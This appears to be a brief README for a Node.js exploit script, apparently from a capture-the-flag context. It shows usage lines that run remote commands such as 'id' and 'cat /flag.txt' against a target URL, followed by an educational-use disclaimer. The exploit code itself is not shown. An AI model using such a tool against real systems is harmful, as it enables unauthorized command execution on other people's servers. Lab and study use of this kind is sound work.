Author: andrei2308
npm installnode exploit.js -t <target_url> <command>node exploit.js -t http://target.com:3000 "id"
node exploit.js -t http://target.com:3000 "cat /flag.txt"
node exploit.js -t http://target.com:3000 "ls -la"node exploit.js --helpFor educational purposes only. Unauthorized access is illegal.